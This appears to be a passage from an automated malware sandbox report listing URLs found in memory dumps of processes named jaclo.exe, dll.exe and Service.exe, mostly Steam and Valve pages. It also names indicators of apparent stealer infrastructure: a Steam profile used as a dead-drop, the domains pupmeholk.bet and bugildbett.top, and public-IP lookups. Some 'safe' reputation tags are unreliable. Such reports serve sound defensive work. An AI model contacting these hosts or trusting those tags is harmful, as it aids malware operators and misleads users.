00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://store.steampowered.com/subscriber_agreement/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://www.gstatic.cn/recaptcha/dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://steamcommunity.com/profiles/76561199822375128/badgesdll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://steamcommunity.com/profiles/76561199822375128/inventory/dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496560456.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553410634.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523296079.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1613114498.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523271647.0000000004014000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558249415.000000000401B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558094984.0000000004015000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.valvesoftware.com/legal.htmjaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&ajaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://www.youtube.comdll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://store.steampowereddll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.google.comdll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2Sjaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://avatars.cloudflare.steamstatic.com/fef7Kdll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engljaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://api.ipify.org6Service.exe, 00000016.00000002.2513052311.000002614254B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackjaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001324000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610800200.000000000127A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000400F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://duckduckgo.com/chrome_newtabv209hdll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://community.cloudflare.steamstatic.com/public/css/skin_1/fatalerror.css?v=OFUqlcDNiD6y&l=ejaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001256000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://s.ytimg.com;dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDjaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://steam.tv/dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://pupmeholk.bet/#kKdll.exe, 00000010.00000003.1495951794.000000000122F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://steamcommunity.com/sjaclo.exe, 0000000D.00000003.1397924687.0000000001350000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400600163.0000000001350000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=V4P4q3q732jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610831890.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611227058.000000000126C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612147123.0000000001255000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612221238.0000000001270000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=sd6kCnGQW5Ji&jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553180293.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001261000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610907365.0000000001264000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.000000000125F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571652428.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001269000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571451074.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586877703.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612167394.0000000001258000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1611173934.000000000400E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472449424.000000000125C000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527495888.000000000125F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://pupmeholk.bet/pLoskaDGcj9wXRZ1dll.exe, 00000010.00000003.1496127922.000000000401A000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496471640.000000000402E000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1495899437.0000000004015000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1496217135.000000000402D000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523442445.0000000004030000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                unknown
                                                                                                                http://store.steampowered.com/privacy_agreement/jaclo.exe, 0000000D.00000002.1400527279.000000000131C000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013AF000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000002.1400748087.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1385457372.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1558141720.0000000001250000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610850304.0000000001253000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471974297.0000000004017000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471755815.000000000401C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1472429859.0000000004018000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1523252208.0000000004028000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000002.1612127650.0000000001251000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436215139.0000000001254000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001240000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1471708256.000000000402C000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586774168.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://api.ipify.org/THService.exe, 00000018.00000002.2512975134.0000026791CB8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/points/shop/jaclo.exe, 0000000D.00000003.1385457372.00000000013B2000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397866744.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1423924253.0000000001245000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553125645.000000000400B000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1436184660.000000000126A000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1571316639.0000000004023000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610764637.000000000400F000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1586664927.0000000004023000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=dll.exe, 00000010.00000003.1449202247.0000000004118000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://api.ipify.orgInternetOpenUrlService.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          http://ocsp.rootca1.amazontrust.com0:dll.exe, 00000010.00000003.1496798433.0000000004122000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://steamcommunity.com/adll.exe, 00000010.00000002.1611980427.00000000011C7000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1587060011.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1553303136.00000000011C6000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1610970478.00000000011C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://sketchfab.comdll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://steamcommunity.com:443/profiles/76561199822375128dll.exe, 00000010.00000003.1587060011.00000000011CC000.00000004.00000020.00020000.00000000.sdmp, dll.exe, 00000010.00000003.1527625878.00000000011CC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://lv.queniujq.cndll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://bugildbett.top/jaclo.exe, 0000000D.00000002.1400600163.0000000001343000.00000004.00000020.00020000.00000000.sdmp, jaclo.exe, 0000000D.00000003.1397924687.0000000001343000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    • Avira URL Cloud: malware
                                                                                                                                    unknown
                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brdll.exe, 00000010.00000003.1497879582.000000000442E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.youtube.com/dll.exe, 00000010.00000002.1611980427.00000000011F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
